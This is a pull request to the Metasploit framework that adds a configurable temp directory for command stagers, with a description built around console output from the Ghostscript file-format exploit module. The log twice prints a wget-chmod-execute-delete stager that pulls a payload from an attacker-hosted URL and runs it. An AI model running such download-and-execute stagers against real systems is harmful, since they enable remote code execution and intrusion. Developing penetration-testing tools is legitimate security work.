### PR TITLE
Add CMDSTAGER::TEMP with WritableDir fallback

### DIFF
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -57,6 +57,7 @@ module Exploit::CmdStager
       [
         OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
         OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
+        OptString.new('CMDSTAGER::TEMP', [false, 'Writable directory for staged files']),
         OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])
       ], self.class)
   end
@@ -128,6 +129,12 @@ module Exploit::CmdStager
     end
 
     self.stager_instance = create_stager
+
+    if datastore['CMDSTAGER::TEMP']
+      opts[:temp] = datastore['CMDSTAGER::TEMP']
+    elsif datastore['WritableDir']
+      opts[:temp] = datastore['WritableDir']
+    end
 
     if stager_instance.respond_to?(:http?) && stager_instance.http?
       opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)


### PR DESCRIPTION
```
msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run

[*] Using URL: http://0.0.0.0:8081/zTQAQMOYjita40H
[*] Local IP: http://192.168.1.5:8081/zTQAQMOYjita40H
[*] Generated command stager: ["wget -qO /tmp/pMuePBpB http://192.168.1.5:8081/zTQAQMOYjita40H;chmod +x /tmp/pMuePBpB;/tmp/pMuePBpB;rm -f /tmp/pMuePBpB"]
[+] msf.ps stored at /Users/wvu/.msf4/local/msf.ps
[*] Server stopped.
msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set cmdstager::temp /var/tmp
cmdstager::temp => /var/tmp
msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run

[*] Using URL: http://0.0.0.0:8081/OUIC7m8jC
[*] Local IP: http://192.168.1.5:8081/OUIC7m8jC
[*] Generated command stager: ["wget -qO /var/tmp/DsPPLuNZ http://192.168.1.5:8081/OUIC7m8jC;chmod +x /var/tmp/DsPPLuNZ;/var/tmp/DsPPLuNZ;rm -f /var/tmp/DsPPLuNZ"]
[+] msf.ps stored at /Users/wvu/.msf4/local/msf.ps
[*] Server stopped.
msf5 exploit(multi/fileformat/ghostscript_failed_restore) >
```

Maybe resolves #11453. Minimally tested.